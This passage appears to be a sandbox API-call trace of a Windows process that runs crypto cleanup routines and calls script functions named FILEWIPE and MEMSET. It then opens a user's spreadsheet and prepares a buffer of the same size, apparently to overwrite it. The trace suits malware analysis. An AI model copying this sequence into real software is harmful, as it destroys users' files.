0x9c27c8 [0171.340] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.340] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.340] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.343] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.344] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.344] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.348] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0171.348] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0171.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.349] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.349] CryptDestroyKey (hKey=0x90af98) returned 1 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.350] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.350] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0171.350] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.351] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.351] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.351] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.351] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.351] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.351] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.351] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.351] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0171.352] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0171.352] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.352] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.352] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.352] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.352] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.353] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.353] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.353] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.353] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0171.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.353] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0171.354] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.354] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0171.354] FreeLibrary (hLibModule=0x74f20000) returned 1 [0171.354] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.354] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0171.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.357] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.358] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0171.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0171.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.359] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0171.359] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0171.359] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0171.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0171.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.362] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0171.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0171.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.362] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.ods", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c841e50, ftCreationTime.dwHighDateTime=0x1d5e04c, ftLastAccessTime.dwLowDateTime=0xe06b1270, ftLastAccessTime.dwHighDateTime=0x1d5e32b, ftLastWriteTime.dwLowDateTime=0xe06b1270, ftLastWriteTime.dwHighDateTime=0x1d5e32b, nFileSizeHigh=0x0, nFileSizeLow=0x8f0a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="kQVkybnJLUTO.ods", cAlternateFileName="KQVKYB~1.ODS")) returned 0x90af58 [0171.363] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.363] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0171.364] CharLowerBuffW (in: lpsz="byte[36618]", cchLength=0xb | out: lpsz="byte[36618]") returned 0xb [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.365] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.365] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0171.365] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.365] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.365] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0171.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2628 [0171.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0171.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.366] RtlAllocateHeap 